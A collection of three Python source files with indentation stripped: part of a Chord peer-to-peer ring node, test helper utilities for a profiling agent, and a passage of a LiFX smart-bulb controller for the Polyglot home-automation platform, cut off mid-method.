Fixes a random finger of the finger table
:return: None
"""
# TODO maybe priority here (and in successor list?)
log.info("Fixing a finger...")
i = random.randint(1, utils.params["ring"]["bits"] - 1)
log.debug(f"Picked finger {i}")
succ = self.find_successor((self.node_id + 2 ** i) % 2 ** utils.params["ring"]["bits"])
if not succ:
return
self.finger_table[i] = Finger((succ[0], succ[1]), succ[2])
def fix_successor_list(self):
"""
| 1. If successor list empty or index<0, ask successor for successor; if successor dead, end; if successor
| alive, place response at start of list (override or append); if index<0, index=0; end;
| 2. Else, ask current index node in successor list for successor
| 3. If alive and last in list and list is full, index=-1; end;
| 4. If alive and last in list and list not full, append new successor; index+=1; end;
| 5. If alive and not last in list, verify next; if same, index+=1; end; else if different, override next;
| index+=1; end;
| 6. If dead, remove node from successor list; index-=1; end;
:return: None
"""
log.info(f"Fixing successor {self.successor_list_index + 1}")
# ask successor for its successor
if not self.successor_list or self.successor_list_index == -1:
response = self.ask_peer(self.finger_table[0].addr, "get_successor", {})
if not response or response["header"]["status"] not in range(200, 300):
log.debug("Successor didn't respond")
return
if not self.successor_list:
self.successor_list.append(Finger((response["body"]["ip"], response["body"]["port"]),
response["body"]["node_id"]))
elif response["body"]["node_id"] != self.successor_list[0].node_id:
self.successor_list[0] = Finger((response["body"]["ip"], response["body"]["port"]),
response["body"]["node_id"])
self.successor_list_index = 0
log.debug("Updated successor list")
return
# mods index in case stabilize has removed any successors from list
self.successor_list_index %= len(self.successor_list)
response = self.ask_peer(self.successor_list[self.successor_list_index].addr, "get_successor", {})
# current node dead, remove from successor list and decrement index
if not response:
del self.successor_list[self.successor_list_index]
self.successor_list_index -= 1
log.debug("Removed dead node from successor list")
return
# current node alive and last in list
if self.successor_list_index == len(self.successor_list) - 1:
# list at max capacity
if len(self.successor_list) == utils.params["ring"]["bits"]:
self.successor_list_index = -1
log.debug("Verified successor list")
return
# list not at max capacity
self.successor_list.append(Finger((response["body"]["ip"], response["body"]["port"]),
response["body"]["node_id"]))
log.debug("Added new successor to successor list")
self.successor_list_index += 1
return
# current node alive and not last in list
self.successor_list_index += 1
if response["body"]["node_id"] == self.successor_list[self.successor_list_index].node_id:
log.debug("Verified successor list")
return
self.successor_list[self.successor_list_index] = Finger((response["body"]["ip"], response["body"]["port"]),
response["body"]["node_id"])
log.debug("Updated successor list")
def find_successor(self, key_id):
"""
Finds successor for key_id
:param key_id: the ID
:return: tuple of (ID, port), or None if lookup failed
"""
log.debug(f"Finding successor for ID: {key_id}")
# if this is the only node in the network
if self.finger_table[0].node_id == self.node_id:
return self.SERVER_ADDR[0], self.SERVER_ADDR[1], self.node_id
current_node = self.find_predecessor(key_id)
if not current_node:
return None
response = self.ask_peer(current_node, "get_successor", {})
if not response:
return None
return response["body"]["ip"], response["body"]["port"], response["body"]["node_id"]
def find_predecessor(self, key_id):
"""
Finds predecessor for key_id
:param key_id: the ID
:return: tuple of (ID, port), or None if lookup failed
"""
log.debug(f"Finding predecessor for ID: {key_id}")
current_node = Finger(self.SERVER_ADDR, self.node_id)
successor_id = self.finger_table[0].node_id
# keep fallback fingers in case first returned finger is dead
prev_fingers = []
# keep visited nodes to prevent infinite loops
visited_ids = set()
# while key_id is not between node_id and successor_id (while moving clockwise)
while not utils.is_between_clockwise(key_id, current_node.node_id, successor_id, inclusive_upper=True):
# log.debug(f"condition: {current_node.node_id} < {key_id} <= {successor_id}")
# if this finger died in the meantime, get next finger from previous response
while True:
# ask for closest preceding finger (this will also return fallback fingers, if found)
if current_node.node_id not in visited_ids:
response = self.ask_peer(current_node.addr, "get_closest_preceding_finger", {"for_key_id": key_id})
visited_ids.add(current_node.node_id)
else:
response = None
if response:
break
if not prev_fingers:
return None
next_node = prev_fingers.pop(0)
current_node = Finger((next_node["ip"], next_node["port"]), next_node["node_id"])
returned_nodes = response["body"]["fingers"]
prev_fingers = list(returned_nodes)
# request successor from each returned node
for node in returned_nodes:
response2 = self.ask_peer((node["ip"], node["port"]), "get_successor", {})
# if response was received, break
if response2:
current_node = Finger((node["ip"], node["port"]), node["node_id"])
break
prev_fingers.remove(node)
# if all returned nodes are dead
else:
# if successor was contained in nodes, it is dead, so lookup fails
if response["body"]["contains_successor"]:
return None
else:
# get current_node's successor
response = self.ask_peer(current_node.addr, "get_successor", {})
current_node = Finger((response["body"]["ip"], response["body"]["port"]),
response["body"]["node_id"])
# ask successor for its successor
response2 = self.ask_peer(current_node.addr, "get_successor", {})
# if that node is dead, lookup fails
if not response2:
return None
prev_fingers = []
successor_id = response2["body"]["node_id"]
return current_node.addr
def closest_preceding_finger(self, key_id):
"""
Gets closest preceding finger for id key_id, as well as fallback fingers
:param key_id: the ID
:return: Finger pointing to the closest preceding Node, or self if self is the closest preceding Node
"""
log.debug(f"Finding closest preceding finger for ID: {key_id}")
for i in range(utils.params["ring"]["bits"] - 1, -1, -1):
if utils.is_between_clockwise(self.finger_table[i].node_id, self.node_id, key_id):
# get index of first fallback finger
starting_index = i - utils.params["ring"]["fallback_fingers"]
starting_index = starting_index if starting_index >= 0 else 0
# get fallback fingers
fingers = self.finger_table[starting_index:i + 1]
fingers.reverse()
j = 0
# fill in with successor list nodes if there are not enough fallback fingers (low index)
while len(fingers) < utils.params["ring"]["fallback_fingers"] + 1 and j < len(self.successor_list):
fingers.append(self.successor_list[j])
j += 1
return fingers
return [Finger(self.SERVER_ADDR, self.node_id)]
def ask_peer(self, peer_addr, req_type, body_dict, pre_request=False):
"""
Makes request to peer, sending request_msg
Releases writer lock if it is enabled, so RPCs can be handled while waiting for response
Re-locks writer at the end of the method call if it was enabled
:param peer_addr: (IP, port) of peer
:param req_type: type of request for request header
:param body_dict: dictionary of body
:param pre_request: whether request should be preceded by request of type size
:return: string response of peer
"""
w_mode = self.stabilize_mutex.w_locked()
if w_mode:
self.stabilize_mutex.w_leave()
request_msg = utils.create_request({"type": req_type}, body_dict)
# if request is on this node, call RPC handler directly
if peer_addr == self.SERVER_ADDR:
data = REQUEST_MAP[req_type](self, body_dict)
# else, make request for RPC
else:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client:
client.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
client.settimeout(utils.params["net"]["timeout"])
try:
client.connect(peer_addr)
enc_request_msg = request_msg.encode()
if pre_request:
pre_req_msg = utils.create_request({"type": "size"}, {"data_size": len(enc_request_msg)})
# using $ as delimiter to identify pre-requests
pre_req_msg = "$" + pre_req_msg + "$"
client.sendall(pre_req_msg.encode())
client.sendall(enc_request_msg)
data = client.recv(utils.params["net"]["data_size"]).decode()
except (socket.error, socket.timeout):
if w_mode:
self.stabilize_mutex.w_enter()
return None
if w_mode:
self.stabilize_mutex.w_enter()
if not data:
return None
return json.loads(data)
def get_seed(self):
"""
Gets an existing node from seed server
:return: tuple of (IP, port)
"""
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client:
client.settimeout(utils.params["net"]["timeout"])
for i in range(utils.params["seed_server"]["attempt_limit"]):
try:
client.connect((utils.params["seed_server"]["ip"], utils.params["seed_server"]["port"]))
break
except (socket.error, socket.timeout):
log.info(f"Failed to connect to seed server, retrying... "
f"{i + 1}/{utils.params['seed_server']['attempt_limit']}")
time.sleep(2)
else:
log.critical("Connection to seed failed (attempt limit reached)")
exit(1)
client.sendall(utils.create_request({"type": "get_seed"},
{"ip": self.SERVER_ADDR[0], "port": self.SERVER_ADDR[1],
"node_id": self.node_id}).encode())
data = json.loads(client.recv(utils.params["net"]["data_size"]).decode())
return data
def listen(self):
"""
Main server loop
Starts threads for accepting new connections, as well as timing stabilize
Reads shared queue for new data and handles it accordingly
Writer thread: writes all data to the object; any other thread that needs to write data passes it to the queue
:return: None
"""
log.info(f"Starting node on {self.SERVER_ADDR[0]}:{self.SERVER_ADDR[1]}")
# bind server to IP
self.server.bind(self.SERVER_ADDR)
self.server.listen()
# accept incoming connections
connection_listener = threading.Thread(target=self.accept_connections,
args=(self.server, self))
connection_listener.name = "Connection Listener"
connection_listener.daemon = True
# initialize timer for stabilization of node
stabilizer = threading.Thread(target=self.stabilize_timer,
args=(self.event_queue, utils.params["ring"]["stabilize_delay"]))
stabilizer.name = "Stabilizer"
stabilizer.daemon = True
connection_listener.start()
stabilizer.start()
while True:
# wait until event_queue is not empty, then pop
data = self.event_queue.get()
self.stabilize_mutex.w_enter()
log.debug(f"Popped {data} from event queue")
# data == 0 is used for stabilize event
if not data:
self.stabilize()
if self.leaving and self.move_keys_to_successor():
break
self.fix_successor_list()
self.fix_fingers()
# if data is function, call it to update state in main thread
elif callable(data):
data(self)
# if data == 1, immediate leave should be attempted
else:
if self.move_keys_to_successor():
break
self.stabilize_mutex.w_leave()
# Thread Methods
@staticmethod
def accept_connections(server, node):
"""
Accepts a new connection on the passed socket and starts a new thread to handle it
:param server: the socket
:param node: the node
:return: None
"""
while True:
# wait for new connection
conn_details = server.accept()
log.info(f"Got new connection from: {conn_details[1]}")
# start new thread to handle connection
connection_handler = threading.Thread(target=Node.handle_connection, args=(node, conn_details))
connection_handler.name = f"{conn_details[1]} Handler"
connection_handler.start()
@staticmethod
def handle_connection(node, conn_details):
"""
Handles existing connection until it closes
:param node: the node on which to call the method
:param conn_details: connection details (connection, address)
:return: None
"""
connection, address = conn_details
with connection:
data = connection.recv(utils.params["net"]["data_size"]).decode()
if not data:
return
# if $ is first character, pre_request is contained
if data[0] == "$":
# split to ['', pre_request, main_request]
data = data.split("$")
# pre-request is the first part of the received data
pre_request = data[1]
pre_request = json.loads(pre_request)
data_size = pre_request["body"]["data_size"]
# anything received after is part of the main request
main_request = "".join(data[2:])
size_received = len(main_request.encode())
# data might be large chunk, so read in batches
while size_received < data_size:
next_data = connection.recv(utils.params["net"]["data_size"])
size_received += len(next_data)
main_request += next_data.decode()
data = main_request
data = json.loads(data)
# ensure all expected arguments have been sent
for arg in utils.EXPECTED_REQUEST[data["header"]["type"]]:
if arg not in data["body"]:
return
log.debug(f"Got RPC call of type: {data['header']['type']}")
# get mutex so main thread doesn't change object data during RPC
node.stabilize_mutex.r_enter()
# select RPC handler according to RPC type
response = REQUEST_MAP[data["header"]["type"]](node, data["body"])
node.stabilize_mutex.r_leave()
connection.sendall(response.encode())
@staticmethod
def stabilize_timer(event_queue, delay):
"""
Sleeps for specified amount of time, then places 0 in queue
:param event_queue: shared queue
:param delay: amount of time to sleep for
:return: None
"""
while True:
time.sleep(delay)
event_queue.put(0)
|
help_utils.py
|
import threading
import time
from queue import Queue
INTEGRATION_TEST_ACCOUNT_ID = "519630429520"
MY_PROFILING_GROUP_NAME_FOR_INTEG_TESTS = "MyProfilingGroupForIntegrationTests"
DUMMY_TEST_PROFILING_GROUP_NAME = "DummyNameThatWillNotBeUsed"
FILE_PREFIX = "pytest-CodeGuruPythonAgent"
class HelperThreadRunner:
def __init__(self):
pass
def new_helper_sleep_thread(self, sleep_sec=1, thread_name="test-sleep-thread"):
self.sleep_thread = threading.Thread(
name=thread_name, target=self.sleep_for, daemon=True, kwargs={"sleep_sec": sleep_sec})
self.sleep_thread.start()
def sleep_for(self, sleep_sec):
time.sleep(sleep_sec)
def new_helper_thread_blocked_inside_dummy_method(
self, thread_name="test-thread"):
self.ready_queue = Queue()
self.done_queue = Queue()
self.thread = threading.Thread(
name=thread_name, target=self.dummy_parent_method)
self.thread.start()
self.ready_queue.get()
def stop_helper_thread(self):
self.done_queue.put(True)
self.thread.join()
def dummy_method(self):
"""
Running this function in a thread provides us a test stack to compare against.
"""
self.ready_queue.put(True)
self.done_queue.get()
def dummy_parent_method(self):
"""
By creating a function calling the long_running_test_process, we create an ordered stack for testing.
"""
self.dummy_method()
def wait_for(condition, timeout_seconds=1.0, poll_interval_seconds=0.01):
"""
Timed out waiting for condition to be true
"""
end_time = time.time() + timeout_seconds
while time.time() < end_time:
if condition():
return True
time.sleep(poll_interval_seconds)
raise Exception("wait_for: Timed out waiting for condition to be true")
|
lifx-poly.py
|
#!/usr/bin/env python3
##!/home/e42/dev/py3_envs/udi-lifx-poly-venv/bin/python
"""
LiFX NodeServer for UDI Polyglot v2
by Einstein.42 (James Milne) milne.james@gmail.com
"""
import polyinterface
import time
import sys
import lifxlan
from copy import deepcopy
import json
import yaml
from threading import Thread
from pathlib import Path
import math
LOGGER = polyinterface.LOGGER
BR_INCREMENT = 2620 # this is ~4% of 65535
BR_MIN = 1310 # minimum brightness value ~2%
BR_MAX = 65535 # maximum brightness value
FADE_INTERVAL = 5000 # 5s
BRTDIM_INTERVAL = 400 # 400ms
with open('server.json') as data:
SERVERDATA = json.load(data)
data.close()
try:
VERSION = SERVERDATA['credits'][0]['version']
except (KeyError, ValueError):
LOGGER.info('Version not found in server.json.')
VERSION = '0.0.0'
# Changing these will not update the ISY names and labels, you will have to edit the profile.
COLORS = {
0: ['RED', [62978, 65535, 65535, 3500]],
1: ['ORANGE', [5525, 65535, 65535, 3500]],
2: ['YELLOW', [7615, 65535, 65535, 3500]],
3: ['GREEN', [16173, 65535, 65535, 3500]],
4: ['CYAN', [29814, 65535, 65535, 3500]],
5: ['BLUE', [43634, 65535, 65535, 3500]],
6: ['PURPLE', [50486, 65535, 65535, 3500]],
7: ['PINK', [58275, 65535, 47142, 3500]],
8: ['WHITE', [58275, 0, 65535, 5500]],
9: ['COLD_WHTE', [58275, 0, 65535, 9000]],
10: ['WARM_WHITE', [58275, 0, 65535, 3200]],
11: ['GOLD', [58275, 0, 65535, 2500]]
}
class Controller(polyinterface.Controller):
def __init__(self, polyglot):
super().__init__(polyglot)
self.lifxLan = None
self.name = 'LiFX Controller'
self.discovery_thread = None
self.update_nodes = False
self.change_pon = True
self.ignore_second_on = False
self.bulbs_found = 0
def start(self):
LOGGER.info('Starting LiFX Polyglot v2 NodeServer version {}, LiFX LAN: {}'.format(VERSION, lifxlan.__version__))
if 'change_no_pon' in self.polyConfig['customParams']:
LOGGER.debug('Change of color won\'t power bulbs on')
self.change_pon = False
if 'ignore_second_on' in self.polyConfig['customParams']:
LOGGER.debug('DON will be ignored if already on')
self.ignore_second_on = True
self._checkProfile()
self.discover()
LOGGER.debug('Start complete')
def stop(self):
LOGGER.info('Stopping LiFX Polyglot v2 NodeServer version {}'.format(VERSION))
def _checkProfile(self):
profile_version_file = Path('profile/version.txt')
if profile_version_file.is_file() and 'customData' in self.polyConfig:
with profile_version_file.open() as f:
profile_version = f.read().replace('\n', '')
f.close()
if 'prof_ver' in self.polyConfig['customData']:
if self.polyConfig['customData']['prof_ver'] != profile_version:
self.update_nodes = True
else:
self.update_nodes = True
if self.update_nodes:
LOGGER.info('New Profile Version detected: {}, all nodes will be updated'.format(profile_version))
cust_data = deepcopy(self.polyConfig['customData'])
cust_data['prof_ver'] = profile_version
self.saveCustomData(cust_data)
self.updateNode(self)
def shortPoll(self):
if self.discovery_thread is not None:
if self.discovery_thread.isAlive():
LOGGER.debug('Skipping shortPoll() while discovery in progress...')
return
else:
self.discovery_thread = None
for node in self.nodes:
self.nodes[node].update()
def longPoll(self):
if self.discovery_thread is not None:
if self.discovery_thread.isAlive():
LOGGER.debug('Skipping longPoll() while discovery in progress...')
return
else:
self.discovery_thread = None
for node in self.nodes:
self.nodes[node].long_update()
def update(self):
pass
def long_update(self):
pass
def discover(self, command=None):
self.lifxLan = lifxlan.LifxLAN()
if self.discovery_thread is not None:
if self.discovery_thread.isAlive():
LOGGER.info('Discovery is still in progress')
return
self.discovery_thread = Thread(target=self._discovery_process)
self.discovery_thread.start()
def _manual_discovery(self):
try:
f = open(self.polyConfig['customParams']['devlist'])
except Exception as ex:
LOGGER.error('Failed to open {}: {}'.format(self.polyConfig['customParams']['devlist'], ex))
return False
try:
data = yaml.safe_load(f.read())
f.close()
except Exception as ex:
LOGGER.error('Failed to parse {} content: {}'.format(self.polyConfig['customParams']['devlist'], ex))
return False
if 'bulbs' not in data:
LOGGER.error('Manual discovery file {} is missing bulbs section'.format(self.polyConfig['customParams']['devlist']))
return False
for b in data['bulbs']:
name = b['name']
address = b['mac'].replace(':', '').lower()
mac = b['mac']
ip = b['ip']
if not address in self.nodes:
self.bulbs_found += 1
if b['type'] == 'multizone':
d = lifxlan.MultiZoneLight(mac, ip)
''' Save object reference if we need it for group membership '''
b['object'] = d
LOGGER.info('Found MultiZone Bulb: {}({})'.format(name, address))
self.addNode(MultiZone(self, self.address, address, name, d), update = self.update_nodes)
else:
d = lifxlan.Light(mac, ip)
''' Save object reference if we need it for group membership '''
b['object'] = d
LOGGER.info('Found Bulb: {}({})'.format(name, address))
self.addNode(Light(self, self.address, address, name, d), update = self.update_nodes)
self.setDriver('GV0', self.bulbs_found)
if 'groups' not in data:
LOGGER.info('Manual discovery file {} is missing groups section'.format(self.polyConfig['customParams']['devlist']))
return True
for grp in data['groups']:
members = []
for member_light in grp['members']:
light_found = False
for b in data['bulbs']:
if b['name'] == member_light:
members.append(b['object'])
light_found = True
break
if not light_found:
LOGGER.error('Group {} light {} is not found'.format(grp['name'], member_light))
LOGGER.info('Group {}, {} members'.format(grp['name'], len(members)))
if len(members) > 0:
gaddress = grp['address']
glabel = grp['name']
if not gaddress in self.nodes:
LOGGER.info('Found LiFX Group: {}'.format(glabel))
grp = lifxlan.Group(members)
self.addNode(Group(self, self.address, gaddress, glabel, grp), update = self.update_nodes)
return True
def _discovery_process(self):
LOGGER.info('Starting LiFX Discovery thread...')
if 'devlist' in self.polyConfig['customParams']:
LOGGER.info('Attempting manual discovery...')
if self._manual_discovery():
LOGGER.info('Manual discovery is complete')
return
else:
LOGGER.error('Manual discovery failed')
try:
devices = self.lifxLan.get_lights()
LOGGER.info('{} bulbs found. Checking status and adding to ISY if necessary.'.format(len(devices)))
for d in devices:
label = str(d.get_label())
name = 'LIFX {}'.format(label)
address = d.get_mac_addr().replace(':', '').lower()
if not address in self.nodes:
self.bulbs_found += 1
if d.supports_multizone():
LOGGER.info('Found MultiZone Bulb: {}({})'.format(name, address))
self.addNode(MultiZone(self, self.address, address, name, d), update = self.update_nodes)
else:
LOGGER.info('Found Bulb: {}({})'.format(name, address))
self.addNode(Light(self, self.address, address, name, d), update = self.update_nodes)
gid, glabel, gupdatedat = d.get_group_tuple()
gaddress = glabel.replace("'", "").replace(' ', '').lower()[:12]
if not gaddress in self.nodes:
LOGGER.info('Found LiFX Group: {}'.format(glabel))
self.addNode(Group(self, self.address, gaddress, glabel), update = self.update_nodes)
except (lifxlan.WorkflowException, OSError, IOError, TypeError) as ex:
LOGGER.error('discovery Error: {}'.format(ex))
self.update_nodes = False
try:
old_bulbs_found = int(self.getDriver('GV0'))
except:
old_bulbs_found = self.bulbs_found
else:
if self.bulbs_found != old_bulbs_found:
LOGGER.info('NOTICE: Bulb count {} is different, was {} previously'.format(self.bulbs_found, old_bulbs_found))
self.setDriver('GV0', self.bulbs_found)
LOGGER.info('LiFX Discovery thread is complete.')
def all_on(self, command):
try:
self.lifxLan.set_power_all_lights("on", rapid=True)
except (lifxlan.WorkflowException, OSError, IOError, TypeError) as ex:
LOGGER.error('All On Error: {}'.format(str(ex)))
def all_off(self, command):
try:
self.lifxLan.set_power_all_lights("off", rapid=True)
except (lifxlan.WorkflowException, OSError, IOError, TypeError) as ex:
LOGGER.error('All Off Error: {}'.format(str(ex)))
def set_wf(self, command):
WAVEFORM = ['Saw', 'Sine', 'HalfSine', 'Triangle', 'Pulse']
query = command.get('query')
wf_color = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')), int(query.get('K.uom26'))]
wf_period = int(query.get('PE.uom42'))
wf_cycles = int(query.get('CY.uom56'))
wf_duty_cycle = int(query.get('DC.uom56'))
wf_form = int(query.get('WF.uom25'))
if wf_form >= 5:
wf_transient = 1
wf_form -= 5
else:
wf_transient = 0
LOGGER.debug('Color tuple: {}, Period: {}, Cycles: {}, Duty cycle: {}, Form: {}, Transient: {}'.format(wf_color, wf_period, wf_cycles, wf_duty_cycle, WAVEFORM[wf_form], wf_transient))
try:
self.lifxLan.set_waveform_all_lights(wf_transient, wf_color, wf_period, wf_cycles, wf_duty_cycle, wf_form)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting Waveform for all lights: {}'.format(str(ex)))
def setColor(self, command):
_color = int(command.get('value'))
try:
self.lifxLan.set_color_all_lights(COLORS[_color][1], rapid=True)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting all bulb color: {}'.format(str(ex)))
def setHSBKD(self, command):
query = command.get('query')
try:
color = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')), int(query.get('K.uom26'))]
duration = int(query.get('D.uom42'))
LOGGER.info('Received manual change, updating all bulb to: {} duration: {}'.format(str(color), duration))
except TypeError:
duration = 0
try:
self.lifxLan.set_color_all_lights(color, duration=duration, rapid=True)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting all bulb color: {}'.format(str(ex)))
drivers = [{'driver': 'ST', 'value': 1, 'uom': 2},
{'driver': 'GV0', 'value': 0, 'uom': 56}
]
id = 'controller'
commands = {'DISCOVER': discover, 'DON': all_on, 'DOF': all_off,
'SET_COLOR': setColor, 'SET_HSBKD': setHSBKD, 'WAVEFORM': set_wf
}
class Light(polyinterface.Node):
"""
LiFX Light Parent Class
"""
def __init__(self, controller, primary, address, name, dev):
super().__init__(controller, primary, address, name)
self.device = dev
self.name = name
self.power = False
self.connected = 1
self.uptime = 0
self.color= []
self.lastupdate = time.time()
self.duration = 0
def start(self):
try:
self.duration = int(self.getDriver('RR'))
except:
self.duration = 0
self.update()
self.long_update()
def query(self, command = None):
self.update()
self.long_update()
self.reportDrivers()
def update(self):
connected = 0
try:
self.color = list(self.device.get_color())
except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} bulb color. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
connected = 1
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, self.color[ind])
try:
power_now = True if self.device.get_power() == 65535 else False
if self.power != power_now:
if power_now:
self.reportCmd('DON')
else:
self.reportCmd('DOF')
self.power = power_now
except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} bulb power. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
connected = 1
if self.power:
self.setDriver('ST', self._bri_to_percent(self.color[2]))
else:
self.setDriver('ST', 0)
self.connected = connected
self.setDriver('GV5', self.connected)
self.setDriver('RR', self.duration)
self.lastupdate = time.time()
def long_update(self):
connected = 0
try:
self.uptime = self._nanosec_to_hours(self.device.get_uptime())
except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} bulb uptime. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
connected = 1
self.setDriver('GV6', self.uptime)
if self.device.supports_infrared():
try:
ir_brightness = self.device.get_infrared()
except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} bulb Infrared. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
connected = 1
self.setDriver('GV7', ir_brightness)
else:
self.setDriver('GV7', 0)
try:
wifi_signal = math.floor(10 * math.log10(self.device.get_wifi_signal_mw()) + 0.5)
except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} bulb WiFi signal strength. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
connected = 1
self.setDriver('GV0', wifi_signal)
self.connected = connected
self.setDriver('GV5', self.connected)
self.lastupdate = time.time()
def _nanosec_to_hours(self, ns):
return int(round(ns/(1000000000.0*60*60)))
def _bri_to_percent(self, bri):
return float(round(bri*100/65535, 4))
def _power_on_change(self):
if not self.controller.change_pon or self.power:
return
try:
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting {} bulb power. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.power = True
self.setDriver('ST', self._bri_to_percent(self.color[2]))
def setOn(self, command):
cmd = command.get('cmd')
val = command.get('value')
new_bri = None
if cmd == 'DFON' and self.color[2] != BR_MAX:
new_bri = BR_MAX
trans = 0
elif cmd == 'DON' and val is not None:
new_bri = int(round(int(val)*65535/255))
if new_bri > BR_MAX:
new_bri = BR_MAX
elif new_bri < BR_MIN:
new_bri = BR_MIN
trans = self.duration
elif self.power and self.controller.ignore_second_on:
LOGGER.info('{} is already On, ignoring DON'.format(self.name))
return
elif self.power and self.color[2] != BR_MAX:
new_bri = BR_MAX
trans = self.duration
if new_bri is not None:
self.color[2] = new_bri
try:
self.device.set_color(self.color, trans, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error DON {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.setDriver('GV3', self.color[2])
try:
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting {} bulb power. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.power = True
self.setDriver('ST', self._bri_to_percent(self.color[2]))
def setOff(self, command):
try:
self.device.set_power(False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting {} bulb power. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.power = False
self.setDriver('ST', 0)
def dim(self, command):
if self.power is False:
LOGGER.info('{} is off, ignoring DIM'.format(self.name))
new_bri = self.color[2] - BR_INCREMENT
if new_bri < BR_MIN:
new_bri = BR_MIN
self.color[2] = new_bri
try:
self.device.set_color(self.color, BRTDIM_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on dimming {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.setDriver('ST', self._bri_to_percent(self.color[2]))
self.setDriver('GV3', self.color[2])
def brighten(self, command):
if self.power is False:
# Bulb is currently off, let's turn it on ~2%
self.color[2] = BR_MIN
try:
self.device.set_color(self.color, 0, rapid=False)
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on brightnening {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.power = True
self.setDriver('ST', self._bri_to_percent(self.color[2]))
return
new_bri = self.color[2] + BR_INCREMENT
if new_bri > BR_MAX:
new_bri = BR_MAX
self.color[2] = new_bri
try:
self.device.set_color(self.color, BRTDIM_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on dimming {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.setDriver('ST', self._bri_to_percent(self.color[2]))
self.setDriver('GV3', self.color[2])
def fade_up(self, command):
if self.power is False:
# Bulb is currently off, let's turn it on ~2%
self.color[2] = BR_MIN
try:
self.device.set_color(self.color, 0, rapid=False)
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on brightnening {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.power = True
self.setDriver('ST', self._bri_to_percent(self.color[2]))
if self.color[2] == BR_MAX:
LOGGER.info('{} Can not FadeUp, already at maximum'.format(self.name))
return
self.color[2] = BR_MAX
try:
self.device.set_color(self.color, FADE_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error {} bulb Fade Up. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
def fade_down(self, command):
if self.power is False:
LOGGER.error('{} can not FadeDown as it is currently off'.format(self.name))
return
if self.color[2] <= BR_MIN:
LOGGER.error('{} can not FadeDown as it is currently at minimum'.format(self.name))
return
self.color[2] = BR_MIN
try:
self.device.set_color(self.color, FADE_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error {} bulb Fade Down. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
def fade_stop(self, command):
if self.power is False:
LOGGER.error('{} can not FadeStop as it is currently off'.format(self.name))
return
# check current brightness level
try:
self.color = list(self.device.get_color())
except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} bulb color. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, self.color[ind])
if self.color[2] == BR_MIN or self.color[2] == BR_MAX:
LOGGER.error('{} can not FadeStop as it is currently at limit'.format(self.name))
return
try:
self.device.set_color(self.color, 0, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error {} bulb Fade Stop. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
def setColor(self, command):
if self.connected:
_color = int(command.get('value'))
try:
self.device.set_color(COLORS[_color][1], duration=self.duration, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting {} bulb color. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
LOGGER.info('Received SetColor command from ISY. Changing color to: {}'.format(COLORS[_color][0]))
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, COLORS[_color][1][ind])
self._power_on_change()
else:
LOGGER.error('Received SetColor, however the bulb is in a disconnected state... ignoring')
def setManual(self, command):
if self.connected:
_cmd = command.get('cmd')
_val = int(command.get('value'))
if _cmd == 'SETH':
self.color[0] = _val
driver = ['GV1', self.color[0]]
elif _cmd == 'SETS':
self.color[1] = _val
driver = ['GV2', self.color[1]]
elif _cmd == 'SETB':
self.color[2] = _val
driver = ['GV3', self.color[2]]
elif _cmd == 'CLITEMP':
self.color[3] = _val
driver = ['CLITEMP', self.color[3]]
elif _cmd == 'RR':
self.duration = _val
driver = ['RR', self.duration]
try:
